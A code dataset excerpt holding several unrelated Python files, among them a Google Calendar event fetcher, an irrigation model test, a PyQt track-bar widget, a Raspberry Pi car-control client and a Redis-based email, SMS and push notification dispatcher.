df[\"duration_seconds\"] = (pd.to_datetime(df[\"end_utc\"]) - pd.to_datetime(df[\"start_utc\"])).astype(\"timedelta64[s]\")\n return df\n\n\ndef get_google_calendar_events(calendar_id, total_days):\n \"\"\"\n Calls the Google Calendar API to pull calendar events\n :param calendar_id: Google calendar ID\n :param total_days: total days in the future to pull\n :return: returns a list of first 2500 events (Google API property) or up to \"total days\" worth of events, each event is a dictionary\n \"\"\"\n credentials = _get_google_calendar_creds()\n try:\n service = build(\"calendar\", \"v3\", credentials=credentials)\n except ServerNotFoundError as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print(\"Can't connect to Google Calendar. Check the internet connection.\")\n return\n now = dt.datetime.utcnow()\n last_day = (now + dt.timedelta(days=total_days)).isoformat() + \"Z\"\n now = now.isoformat() + \"Z\" # 'Z' indicates UTC time\n try:\n events_result = (\n service.events()\n .list(\n calendarId=calendar_id,\n timeMin=now,\n timeMax=last_day,\n singleEvents=True,\n orderBy=\"startTime\",\n timeZone=\"UTC\",\n )\n .execute()\n )\n except ServerNotFoundError as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print(\"Exiting. Can't get calendar events from the Google Calendar. 
Check the internet connection.\")\n return\n events = events_result.get(\"items\", [])\n events = _format_calendar_events(events)\n return events\n","sub_path":"_google_calendar_api.py","file_name":"_google_calendar_api.py","file_ext":"py","file_size_in_byte":4431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"192865259","text":"import unittest\nimport models.irrigationmodel as irrigationmodel\nfrom models.irrigationmodel import IrrigationType\n\nclass Test(unittest.TestCase):\n \n def testModel(self):\n inputs = { \"water_use_total\":12.45,\n \"irrigation_types_proportions\":\n {\n IrrigationType.surface_irrigation_no_energy:0.1,\n IrrigationType.surface_irrigation_electricity:0.05,\n IrrigationType.surface_irrigation_diesel:0.15,\n IrrigationType.sprinkler_irrigation_electricity:0.20,\n IrrigationType.sprinkler_irrigation_diesel:0.18,\n IrrigationType.drip_irrigation_electricity:0.02,\n IrrigationType.drip_irrigation_diesel:0.30\n }\n }\n expectedResults = {\"m_Irr_water_to_air\": 8.8146,\n \"m_Irr_water_to_water_river\": 2.90831999,\n \"m_Irr_water_to_water_groundwater\": 0.72707999\n }\n \n results = irrigationmodel.IrrigationModel(inputs).compute()\n \n for key, value in expectedResults.items():\n #if type(value) is dict:\n # for k,v in value.items():\n # self.assertAlmostEqual(results[key][k], v)\n self.assertAlmostEqual(results[key], value)\n \nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"src/test/python/models/test_irrigationmodel.py","file_name":"test_irrigationmodel.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"227324292","text":"import numpy as np\r\nimport math\r\n\r\ndef geometry():\r\n\r\n # Geometry input\r\n r_hub_LE = np.array([0.2, 0.2, 0.2, 0.2])\r\n r_hub_TE = np.array([0.2, 0.2, 0.2, 0.2])\r\n r_tip_LE = np.array([0.270, 0.280, 0.290, 0.300])\r\n r_tip_TE = np.array([0.2790, 0.2890, 0.3020, 0.3120])\r\n x_LE = np.array([0, 0.05, 0.09, 0.130]) #coordinates\r\n x_TE = np.array([0.04, 0.08, 0.120, 0.170])\r\n angle_in_blade = np.array([0, 12, 6.5, 12]) #must be in degrees\r\n D_LE = np.array([0.0025, 0.0025, 0.0025, 0.0025])\r\n chord = np.array([0.0600, 0.0400, 0.0600, 0.0400])\r\n b = np.array([0.040, 0.020, 0.030, 0.020]) #axial chord\r\n s = np.array([0.030, 0.053, 0.030, 0.053]) #pitch\r\n SONC = np.array([0.8, 0.8, 0.8, 0.8]) #pitch/chord ratio\r\n SONE = np.array([0, 0, 0, 0]) #pitch/mean radius of curvature\r\n TONC = np.array([0.2, 0.2, 0.2, 0.2]) #Blade thickness/chord\r\n TE = np.array([0.0008, 0.0006, 0.0008, 0.0006])\r\n OONS = np.array([0.34, 0.34, 0.34, 0.34]) #Throat/pitch\r\n CLR = np.array([0, 0.00025, 0, 0.00025])\r\n\r\n rows = s.size\r\n\r\n r_EULER_LE = np.zeros([rows], dtype=float)\r\n r_EULER_TE = np.zeros([rows], dtype=float)\r\n O = np.zeros([rows], dtype=float)\r\n A_LE = np.zeros([rows], dtype=float)\r\n A_TE = np.zeros([rows], dtype=float)\r\n A_TH = np.zeros([rows], dtype=float)\r\n h = np.zeros([rows], dtype=float)\r\n ClONH = np.zeros([rows], dtype=float)\r\n v_n = np.zeros([rows], dtype=float)\r\n v_n_gap = np.zeros([rows-1], dtype=float)\r\n AR = np.zeros([rows], dtype=float)\r\n HubTipRatio = np.zeros([rows], dtype=float)\r\n rTEONO = np.zeros([rows], dtype=float)\r\n\r\n\r\n for i in range(0, rows):\r\n r_EULER_LE[i] = math.sqrt((r_hub_LE[i]**2+r_tip_LE[i]**2)/2)\r\n r_EULER_TE[i] = math.sqrt((r_hub_TE[i]**2+r_tip_TE[i]**2)/2)\r\n\r\n for i in range(0, 
rows):\r\n if s[i] >= 1:\r\n s[i] = 2*math.pi*r_EULER_TE[i]/s[i]\r\n\r\n O[i] = OONS[i]*s[i] #Throat\r\n\r\n A_LE[i] = math.pi*(r_tip_LE[i]**2 - r_hub_LE[i]**2)\r\n A_TE[i] = math.pi*(r_tip_TE[i]**2 - r_hub_TE[i]**2)\r\n A_TH[i] = OONS[i]*(5*A_TE[i]+A_LE[i])/6 #Throat area according to Ainley\r\n\r\n #Average blade height\r\n h[i] = (r_tip_LE[i] - r_hub_LE[i] + r_tip_TE[i] - r_hub_TE[i])/2\r\n\r\n ClONH[i] = CLR[i]/h[i] #clearance / blade height\r\n\r\n #Angular change of Euler radius\r\n v_n[i] = math.atan((r_EULER_TE[i]-r_EULER_LE[i])/b[i])\r\n\r\n\r\n if i<(3):#check this here\r\n v_n_gap[i] = math.atan((r_EULER_LE[i+1]-r_EULER_TE[i])/(x_LE[i+1]-x_TE[i]))\r\n\r\n AR[i] = h[i]/b[i]\r\n HubTipRatio[i] = (r_hub_LE[i] + r_hub_TE[i])/(r_tip_LE[i] + r_tip_TE[i])\r\n rTEONO[i] = TE[i] /O[i]\r\n\r\n return r_EULER_LE, r_EULER_TE, s, O, A_LE, A_TE, A_TH, h, ClONH, v_n, v_n_gap, AR, HubTipRatio, rTEONO, angle_in_blade,\r\n\r\ndef P_inlet():\r\n p = 8 #Turbine inlet pressure (Bar)\r\n return 101325*p\r\n\r\ndef P_outlet():\r\n return 101325*1\r\n\r\ndef T_inlet():\r\n t_inlet = 826.85 #turbine inlet temp.\r\n return t_inlet\r\n\r\ndef etap():\r\n return 0.85 #polytropic efficiency\r\n","sub_path":"indata.py","file_name":"indata.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"643638743","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Created by Andre Anjos \n# Ter 01 Set 2009 17:27:34 CEST \n\n\"\"\"Mail functions.\n\"\"\"\n\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.template import loader, RequestContext\nfrom django.utils import translation\nfrom project.util import fix_apos\n\ndef mail_somebody(request, object, subject_template, message_template):\n if not object.email: return False\n context = RequestContext(request, {'object': object})\n translation.activate(object.language)\n subject = fix_apos(loader.render_to_string(subject_template, context))\n subject = subject.replace('\\n','')\n to = u'%s <%s>' % (object.get_full_name(), object.email)\n sender = settings.DEFAULT_FROM_EMAIL\n message = fix_apos(loader.render_to_string(message_template, context))\n translation.deactivate()\n send_mail(subject=subject, message=message, from_email=sender, recipient_list=(to,))\n\ndef mail_managers(request, object, subject_template, message_template):\n \"\"\"Mails managers summarizing something.\"\"\"\n context = RequestContext(request, {'object': object})\n subject = fix_apos(loader.render_to_string(subject_template, context))\n subject = subject.replace('\\n','')\n message = fix_apos(loader.render_to_string(message_template, context))\n to = []\n for r in settings.MANAGERS: to.append(u'%s <%s>' % (r[0], r[1]))\n sender = settings.DEFAULT_FROM_EMAIL\n send_mail(subject=subject, message=message, from_email=sender, recipient_list=to)\n\ndef mail_submitter(request, object):\n \"\"\"Mails a user about a new object created in their name.\"\"\"\n subject_template = 'submitter_subject.txt'\n message_template = 'submitter_message.txt'\n mail_somebody(request, object, subject_template, message_template)\n\ndef mail_submission(request, object):\n \"\"\"Mails managers summarizing something.\"\"\"\n subject_template = 'submission_subject.txt'\n message_template = 'submission_message.txt'\n mail_managers(request, object, subject_template, message_template)\n\ndef mail_confirmation(request, object):\n \"\"\"Mails a user about the confirmation of its 
subscription to a session.\"\"\"\n subject_template = 'confirmation_subject.txt'\n message_template = 'confirmation_message.txt'\n mail_somebody(request, object, subject_template, message_template)\n\ndef mail_submission_confirmation(request, object):\n \"\"\"Mails managers summarizing something.\"\"\"\n subject_template = 'confirmation_admin_subject.txt'\n message_template = 'confirmation_admin_message.txt'\n mail_managers(request, object, subject_template, message_template)\n","sub_path":"project/training/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"443030840","text":"import tensorflow as tf\nimport sys\nimport numpy as np\n\nimport FID as F\n\ndef nchw2nhwc(imgs):\n return np.transpose(imgs, [0, 2, 3, 1])\n\ndef nhwc2nchw(imgs):\n return np.transpose(imgs, [0, 3, 1, 2])\n\nprint ('FID of data of files \"', sys.argv[1], '\" and \"', sys.argv[2], '\": ')\n\ngen_data = []\nreal_data = []\n# Default is nhwc:\nnchw = False\n\nassert len(sys.argv) >= 2, 'Invalid number of atguments'\n\nif len(sys.argv) == 3 and (sys.argv[2] == '-NCHW' or sys.argv[2] == '-nchw'):\n nchw = True\nif len(sys.argv) == 4 and (sys.argv[3] == '-NCHW' or sys.argv[3] == '-nchw'):\n nchw = True\n\nassert sys.argv[1].endswith('.npy'), 'Input file of generated data must be .npy'\nassert sys.argv[2].endswith('.npy'), 'Input file of real data must be .npy'\ngen_data = np.load(sys.argv[1])\nprint( 'Generated data loaded...')\nreal_data = np.load(sys.argv[2])\nprint( 'Real data loaded...')\n\nif nchw == False:\n print('Transposing Data...')\n gen_data = nhwc2nchw(gen_data)\n real_data = nhwc2nchw(real_data)\n \n\nsplitnum = 1;\n\nprint ('Calculating Frechet Inception Distance...')\nFIDS = F.FID(gen_data, real_data, splitnum)\nprint ('FID of data of files \"', sys.argv[1], '\" and \"', sys.argv[2], '\": ', FIDS)\n","sub_path":"eval/FIDFile.py","file_name":"FIDFile.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"237813671","text":"\"\"\"Constants used in the `pypesto.predict` module.\"\"\"\n\n\nMODE_FUN = 'mode_fun' # mode for function values\nMODE_RES = 'mode_res' # mode for residuals\n\nOUTPUT_IDS = 'output_ids' # data member in PredictionConditionResult\nPARAMETER_IDS = 'x_names' # data member in PredictionConditionResult\nCONDITION_IDS = 'condition_ids'\nTIMEPOINTS = 'timepoints' # data member in PredictionConditionResult\nOUTPUT = 'output' # field in the return dict of AmiciPredictor\nOUTPUT_SENSI = 'output_sensi' # field in the return dict of AmiciPredictor\nOUTPUT_WEIGHT = 'output_weight' # field in the return dict of AmiciPredictor\nOUTPUT_SIGMAY = 'output_sigmay' # field in the return dict of AmiciPredictor\n\n# separator in the conditions_ids betweeen preequilibration and simulation\n# condition\nCONDITION_SEP = '::'\n\nRDATAS = 'rdatas' # return field of call to pypesto objective\nAMICI_T = 't' # return field in amici simulation result\nAMICI_X = 'x' # return field in amici simulation result\nAMICI_SX = 'sx' # return field in amici simulation result\nAMICI_Y = 'y' # return field in amici simulation result\nAMICI_SY = 'sy' # return field in amici simulation result\nAMICI_LLH = 'llh' # return field in amici simulation result\nAMICI_STATUS = 'status' # return field in amici simulation result\nAMICI_SIGMAY = 'sigmay' # return field in amici simulation result\n\nCSV = 'csv' # return file 
format\nH5 = 'h5' # return file format\nTIME = 'time' # column name in returned csv\n\nCONDITION = 'condition'\nCONDITION_IDS = 'condition_ids'\n\n\ndef get_condition_label(condition_id: str) -> str:\n \"\"\"Convert a condition ID to a label.\n\n Labels for conditions are used at different locations (e.g. ensemble\n prediction code, and visualization code). This method ensures that the same\n condition is labeled identically everywhere.\n\n Parameters\n ----------\n condition_id:\n The condition ID that will be used to generate a label.\n\n Returns\n -------\n The condition label.\n \"\"\"\n return f'condition_{condition_id}'\n","sub_path":"pypesto/predict/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"244001669","text":"import os\nimport sys\n\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtNetwork import *\n\nfrom qex import *\n\nclass QTrackBar(QWidget):\n '''\n Tick bar (a progress bar with scale marks)\n '''\n\n def __init__(self, name = \"\", value = 0.0, unit = \"\", minValue = 0, maxValue = 200, precisionRuler = 0, precisionTitle = 1, parent = None):\n super(QTrackBar, self).__init__()\n self.parent = parent\n\n self.name = \"\"\n self.unit = \"\"\n\n self.maxValue = 100\n self.minValue = 0\n self.value = 0.0\n\n self.precisionRuler = 0 # number of decimal places to keep\n self.precisionTitle = 1 \n\n self.longStep = 10 # step between long tick lines\n self.shortStep = 1 # step between short tick lines \n self.space_top = 20 \n self.space_bottom = 20\n self.space_left = 30\n self.space_right = 30\n\n self.color_line = QColor(255, 255, 255)\n self.color_title = QColor(0, 255, 0)\n \n self.color_back_start = QColor(100, 100, 100)\n self.color_back_end = QColor(60, 60, 60)\n \n self.color_back_bar = QColor(220, 220, 220)\n self.color_fore_bar = QColor(100, 184, 255)\n\n self.setupUi()\n\n self.setName(name)\n self.setValue(value)\n self.setUnit(unit)\n self.setRange(minValue, maxValue)\n self.setPrecisionRuler(precisionRuler)\n self.setPrecisionTitle(precisionTitle)\n\n ''' Private methods '''\n def setupUi(self):\n self.setWindowFlags(Qt.Window | Qt.FramelessWindowHint)\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.setMouseTracking(True)\n self.setFont(QFont(\"MicroSoft Yahei\", 8))\n self.setFixedSize(120, 350)\n\n def paintEvent(self, event):\n event.accept()\n\n # Anti-aliasing\n painter = QPainter(self)\n painter.setRenderHint(QPainter.Antialiasing, True)\n\n # Draw the background\n self.drawBack(painter)\n # Draw the title bar\n self.drawTitle(painter)\n # Draw the ruler\n self.drawRuler(painter)\n # Draw the bar background\n self.drawBarBack(painter)\n # Draw the bar foreground\n self.drawBarFore(painter)\n\n def drawBack(self, painter):\n painter.save()\n painter.setPen(Qt.NoPen)\n lg = QLinearGradient(QPointF(0, 0), QPointF(0, self.height()))\n lg.setColorAt(0.0, self.color_back_start)\n lg.setColorAt(1.0, self.color_back_end)\n painter.setBrush(lg)\n painter.drawRect(self.rect())\n painter.restore()\n\n def drawTitle(self, painter):\n painter.save()\n painter.setPen(self.color_title)\n \n point_name = QPointF(10, self.space_top)\n painter.drawText(point_name, self.name)\n\n str_title = float2str(self.value, self.precisionTitle) + \" \" + self.unit\n fontWidth = painter.fontMetrics().width(str_title)\n pointValue = QPointF(self.width() - fontWidth - 10, self.space_top)\n painter.drawText(pointValue, str_title)\n painter.restore()\n\n def drawRuler(self, painter):\n painter.save()\n painter.setPen(QColor(self.color_line))\n initX = self.space_left + 20\n 
initY = self.space_top + 20\n\n pointTop = QPointF(initX, initY)\n pointBtm = QPointF(initX, self.height() - self.space_bottom)\n painter.drawLine(pointTop, pointBtm)\n\n length = self.height() - self.space_bottom - initY\n increment = length / (self.maxValue - self.minValue)\n\n longLineLength = 10\n shortLineLength = 7\n\n for num in range(self.maxValue, self.minValue-1, -self.shortStep):\n if num % self.longStep == 0 or num == self.minValue:\n pointLeft = QPointF(initX, initY)\n pointRight = QPointF(initX + longLineLength, initY)\n painter.drawLine(pointLeft, pointRight)\n\n str_num = float2str(num, self.precisionRuler)\n fontWidth = painter.fontMetrics().width(str_num)\n fontHeight = painter.fontMetrics().height()\n pointText = QPointF(initX - fontWidth - 5, initY + fontHeight / 3)\n painter.drawText(pointText, str_num);\n else:\n if num % (self.longStep / 2) == 0:\n shortLineLength =7\n else:\n shortLineLength = 4 \n\n pointLeft = QPointF(initX, initY)\n pointRight = QPointF(initX + shortLineLength, initY)\n painter.drawLine(pointLeft, pointRight)\n\n initY += increment * self.shortStep\n\n painter.restore()\n\n def drawBarBack(self, painter):\n painter.save()\n painter.setPen(Qt.NoPen)\n\n initX = self.space_left + 20 + 20\n pointLeftTop = QPointF(initX, self.space_top + 20)\n pointRightBtm = QPointF(self.width() - self.space_right, self.height() - self.space_bottom)\n rectBack = QRectF(pointLeftTop, pointRightBtm)\n\n painter.setBrush(self.color_back_bar)\n painter.drawRect(rectBack)\n\n painter.restore()\n\n def drawBarFore(self, painter):\n painter.save()\n painter.setPen(Qt.NoPen)\n\n height_back = self.height() - self.space_bottom -self.space_top -20\n \n increment = height_back / (self.maxValue - self.minValue)\n height_select = (self.value - self.minValue) * increment\n\n pointLeftTop = QPointF(self.space_left + 20 + 20, self.height() - self.space_bottom - height_select )\n pointRightBtm = QPointF(self.width() - self.space_right, self.height() - self.space_bottom)\n rectFore = QRectF(pointLeftTop, pointRightBtm)\n\n painter.setBrush(self.color_fore_bar)\n painter.drawRect(rectFore)\n\n painter.restore()\n\n '''Public methods'''\n # Set the name\n def setName(self, name):\n if self.name != name:\n self.name = name\n self.update()\n\n # Set the value\n def setValue(self, value):\n if value > self.maxValue: return\n if self.value != value:\n self.value = value\n self.update()\n\n # Set the unit\n def setUnit(self, unit):\n if self.unit != unit:\n self.unit = unit\n self.update()\n\n # Set the range\n def setRange(self, minValue, maxValue):\n if minValue >= maxValue: return\n if self.minValue != minValue or self.maxValue != maxValue:\n self.minValue = minValue\n self.maxValue = maxValue\n self.update()\n\n # Set the minimum value\n def setMinValue(self, minValue):\n if minValue >= self.maxValue: return\n if self.minValue != minValue:\n self.minValue = minValue\n self.update()\n\n # Set the maximum value\n def setMaxValue(self, maxValue):\n if maxValue <= self.minValue: return\n if self.maxValue != maxValue:\n self.maxValue = maxValue\n self.update()\n\n # Set the number of decimal places for the ruler value text\n def setPrecisionRuler(self, precision):\n if precision > 3: return\n if self.precisionRuler != precision:\n self.precisionRuler = precision\n self.update()\n\n # Set the number of decimal places for the title value text\n def setPrecisionTitle(self, precision):\n if precision > 5: return\n if self.precisionTitle != precision:\n self.precisionTitle = precision\n self.update()\n\n # Set the long tick step\n def setLongStep(self, step):\n if self.longStep != step:\n self.longStep = step\n self.update()\n \n # Set the short tick step\n def setShortStep(self, step):\n 
if self.shortStep != step:\n self.shortStep = step\n self.update()\n\n # Set the tick label text color\n def setLineColor(self, color):\n if self.color_line != color:\n self.color_line = color\n self.update()\n\n # Set the title text color\n def setTitleColor(self, color):\n if self.color_title != color:\n self.color_title = color\n self.update()\n\n # Set the background gradient start color\n def setBackColorStart(self, color):\n if self.color_back_start != color:\n self.color_back_start = color\n self.update()\n\n # Set the background gradient end color\n def setBackColorEnd(self, color):\n if self.color_back_end != color:\n self.color_back_end = color\n self.update()\n\n # Set the bar background color\n def setBarBackColor(self, color):\n if self.color_back_bar != color:\n self.color_back_bar = color\n self.update()\n\n # Set the bar foreground color\n def setBarForeColor(self, color):\n if self.color_fore_bar != color:\n self.color_fore_bar = color\n self.update()\n\n # Get the value\n def getValue(self):\n return self.value\n\n # Get the minimum value\n def getMinValue(self):\n return self.minValue\n\n # Get the maximum value\n def getMaxValue(self):\n return self.maxValue\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n w = QTrackBar(\"xx\", 50.365, \"℃\")\n w.setLongStep(20)\n w.setShortStep(2)\n w.show()\n app.exec()","sub_path":"QMyPlugin/qsliderbar.py","file_name":"qsliderbar.py","file_ext":"py","file_size_in_byte":9244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"626274836","text":"# -*- coding: utf-8 -*-\n# File: res_partner.py\n# Author: Israel Calderón\n# Copyright: (C) 2019 All rights reserved by Madkting\n# Created: 2019-08-01\n\nfrom odoo import models, api\n\nfrom ..log.logger import logger\n\n\nclass Base(models.AbstractModel):\n # events notifiers\n _inherit = 'base'\n\n @api.model\n def create(self, vals):\n record = super(Base, self).create(vals)\n try:\n self._event('on_record_create').notify(record, fields=vals.keys())\n except Exception as ex:\n logger.exception(ex)\n return record\n\n def write(self, vals):\n record = super(Base, self).write(vals)\n try:\n self._event('on_record_write').notify(record, fields=vals.keys())\n except Exception as ex:\n logger.exception(ex)\n return record\n","sub_path":"madkting/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"612267589","text":"\"\"\" Project Entrance.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\nimport sys\nimport io\nimport struct\nimport time\nimport picamera\nimport threading\nimport socket\nfrom math import atan, floor\nfrom os.path import join\nimport numpy as np\nfrom PIL import Image\n\nfrom control.controller import Controller\n# from control.car_avoid import CarAvoid\nfrom control.processImage import processImage\nfrom util.detect import Detector\nfrom util import img_process\nfrom config import configs\nimport client\n\nIMG_W = configs['data']['image_width']\nIMG_H = configs['data']['image_height']\nNUM_OF_POINTS = configs['fitting']['num_of_points']\nLOW_LANE_COLOR = np.uint8([[[0,0,0]]])\nUPPER_LANE_COLOR = np.uint8([[[0,0,0]]]) + 40\nCENTER_W, CENTER_H = int(IMG_W / 2), int(IMG_H / 2)\n\nclass Car(object):\n \"\"\" Offline car-control, with only one thread.\n \"\"\"\n def __init__(self):\n self.contorller = Controller()\n # self.avoid = CarAvoid()\n self.detector = Detector()\n self.pre_img_id = -1\n self.cur_img_id = -1\n\n @staticmethod\n def unpackage_paras(packaged_parameters):\n \"\"\" Unpackage the parameters.\n @Paras:\n 
packaged_parameters: np array\n @Returns:\n distance_to_center\n \"\"\"\n cur_paras = packaged_parameters[0:13]\n w_left, w_right, w_middle = cur_paras[0:3], cur_paras[3:6], cur_paras[6:9]\n distance_to_center = cur_paras[9]\n distance_at_middle = cur_paras[10]\n radian = cur_paras[11]\n curvature = cur_paras[12]\n stop_signal = (np.all(w_left == np.zeros(3)) and np.all(w_right == np.zeros(3)))\n return distance_to_center, distance_at_middle, curvature, stop_signal\n\n @staticmethod\n def unpackage_paras_from_buffer(buffer):\n \"\"\" Unpackage the parameters from buffer.\n @Paras:\n buffer: str\n The recv buffer.\n Note that the default recv size should be 112 (np.array(13, dtype=float64))\n @Returns:\n distance_to_tangent\n angle_of_tangent\n \"\"\"\n num_of_paras = floor(len(buffer) / 128)\n packaged_parameters = np.frombuffer(buffer, dtype=np.float64).reshape(int(16 * num_of_paras))\n if len(packaged_parameters) < 16:\n return -1, 0, 0, False\n cur_paras = packaged_parameters[0:16]\n image_id = int(cur_paras[0])\n w_left, w_right = cur_paras[1:4], cur_paras[4:7]\n distance_to_tangent = cur_paras[14]\n angle_of_tangent = cur_paras[15]\n stop_signal = (np.all(w_left == np.zeros(3)) and np.all(w_right == np.zeros(3)))\n return image_id, distance_to_tangent, angle_of_tangent, stop_signal\n\n def send_images(self, connection, stream):\n \"\"\" Send images. Single thread, will block.\n Helper function for online mode.\n \"\"\"\n connection.write(struct.pack('= 34: \n # # no car => lane keeping \n # self.contorller.make_decision('adp_lane_keeping_decision', dis_2_tan, radian_at_tan)\n # else:\n # self.contorller.make_decision('manual_follow_decision', dis_2_tan, radian_at_tan, distance2car)\n stream.seek(0)\n stream.truncate()\n\n def run_online(self, ip, port):\n pass\n\n def run_online_single(self, ip, port):\n client_socket = socket.socket()\n client_socket.connect((ip, port))\n connection = client_socket.makefile('wb')\n first_start = True\n with picamera.PiCamera() as camera:\n camera.resolution = (640, 480)\n camera.framerate = 30\n time.sleep(1)\n stream = io.BytesIO()\n for _ in camera.capture_continuous(stream, 'jpeg', use_video_port=True):\n start_time = time.time()\n self.send_images(connection, stream)\n self.recv_parameters(client_socket)\n if first_start:\n self.contorller.start()\n first_start = False\n print('processed img ' + str(self.cur_img_id), time.time() - start_time)\n connection.write(struct.pack(' 50 and customer_budget <= 100:\r\n print(\"You have a sufficant balance avaliable for any purchase on this store.\")\r\n\r\n elif customer_budget == jackpot:\r\n print(\"You have won the jackpot, use the discount code yes next time you purchase anything from our store!\")\r\n\r\nif menu == '3':\r\n print(\"Thanks for visiting us, have an awesome day!\")\r\n time.sleep(2)\r\n\r\n","sub_path":"shopping_store_version_2.py","file_name":"shopping_store_version_2.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"100960677","text":"\nimport ast\nimport json\n\nimport redis\n\nfrom libapp import app, pubsubd\nfrom libapp.config import libconf, pushconf, smsconf\nfrom libapp.notifications.emailnotifications import EmailNotifications\nfrom libapp.notifications.push import Push\nfrom libapp.notifications.sms import Sms\n\nqueue = redis.StrictRedis(host=libconf.REDIS_HOST, port=libconf.REDIS_PORT, db=libconf.DB_INDEX)\n\n\ndef publish_msg(source_q=libconf.PUB_EMAIL_Q, 
dest_q=libconf.EMAIL_Q):\n q_length = queue.llen(source_q)\n app.logger.info(\"Publisher {queue} length: {data}\".format(queue=source_q, data=q_length))\n if q_length > 0:\n for _ in range(q_length):\n msg_data = queue.rpop(source_q)\n queue.publish(dest_q, msg_data)\n\n\ndef subscribe_msg():\n message = pubsubd.get_message()\n while message is not None:\n data = message.get('data')\n app.logger.info(\"Subscriber read: {data}\".format(data=data))\n if data and type(data) is not long:\n msg_dict = json.loads(data)\n msg_type = msg_dict.get(\"msg_type\", \"\")\n to = msg_dict.get(\"to\", \"\")\n category = msg_dict.get(\"category\", \"\")\n author = msg_dict.get(\"author\", \"\")\n template = msg_dict.get(\"template\", \"\")\n message_content = msg_dict.get(\"message_content\", \"\")\n\n if isinstance(message_content, unicode):\n app.logger.info(\"Error: {data}\".format(data=type(message_content)))\n message_content = ast.literal_eval(message_content)\n\n if msg_type == \"email\":\n # It is email notification\n from_email = msg_dict.get(\"from_email\", \"\")\n subject = msg_dict.get(\"subject\", \"\")\n\n # Call email notifier\n email_obj = EmailNotifications()\n email_obj.message_notifier(msg_type=msg_type, author=author, category=category, template=template,\n from_email=from_email, to=to, subject=subject,\n message_content=message_content)\n elif msg_type == \"sms\":\n # It is sms notification\n senderid = msg_dict.get(\"senderid\", smsconf.SENDERID.OFFICE.name)\n accusage = msg_dict.get(\"accusage\", smsconf.ACCUSAGE.trans.value)\n\n # Call sms notifier\n sms_obj = Sms()\n sms_obj.message_notifier(msg_type=msg_type, author=author, category=category, template=template,\n senderid=senderid, mobile=to, accusage=accusage,\n message_content=message_content)\n elif msg_type == \"push\":\n # It is Push notification\n is_json = pushconf.IS_JSON\n retries = pushconf.RETRIES\n if \"is_json\" in message_content:\n is_json = message_content.get(\"is_json\", False)\n message_content.pop(\"is_json\", None)\n if \"retries\" in message_content:\n retries = message_content.get(\"retries\", pushconf.RETRIES)\n message_content.pop(\"retries\", None)\n\n registration_id = None\n registration_ids = None\n if to and len(to) == 1:\n registration_id = to[0]\n is_json = False\n elif to and len(to) > 1:\n registration_ids = to\n else:\n pass\n\n # Call push notifier\n push_obj = Push()\n push_obj.message_notifier(msg_type=msg_type, author=author, category=category, template=template,\n is_json=is_json, retries=retries, registration_ids=registration_ids,\n registration_id=registration_id, message_content=message_content)\n else:\n # Its a web notification\n pass\n\n message = pubsubd.get_message()\n","sub_path":"libapp/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"427965395","text":"\nfrom Qt import QtCore, QtWidgets\nfrom . 
import api\nfrom .PaymentsView import PaymentsView\n\n\nclass MainWindow(QtWidgets.QWidget):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setWindowTitle(\"Debitoor Expenses\")\n mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(mainLayout)\n\n hbar = QtWidgets.QHBoxLayout()\n mainLayout.addLayout(hbar)\n hbar.addWidget(QtWidgets.QLabel('Account:'))\n self.account = QtWidgets.QComboBox()\n self.account.currentIndexChanged.connect(lambda: self.payments.setAccount(self.getAccount()))\n hbar.addWidget(self.account)\n\n hbar = QtWidgets.QHBoxLayout()\n hbar.addWidget(QtWidgets.QLabel('Search:'))\n self.searchText = QtWidgets.QLineEdit()\n self.searchText.returnPressed.connect(lambda: self.searchButton.clicked.emit())\n self.searchButton = QtWidgets.QPushButton('Go')\n self.searchButton.clicked.connect(lambda: self.payments.setSearchString(self.searchText.text()))\n hbar.addWidget(self.searchText)\n hbar.addWidget(self.searchButton)\n mainLayout.addLayout(hbar)\n\n hbar = QtWidgets.QHBoxLayout()\n mainLayout.addLayout(hbar)\n self.payments = PaymentsView()\n hbar.addWidget(self.payments)\n\n self.initValues()\n\n def initValues(self):\n for account in api.paymentaccounts():\n self.account.addItem(account['accountName'])\n\n def getAccount(self):\n return api.paymentaccounts()[self.account.currentIndex()]\n","sub_path":"app/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58178797","text":"__author__ = 'Tarek'\r\n\r\n\r\nfrom pylms.server import Server\r\nfrom 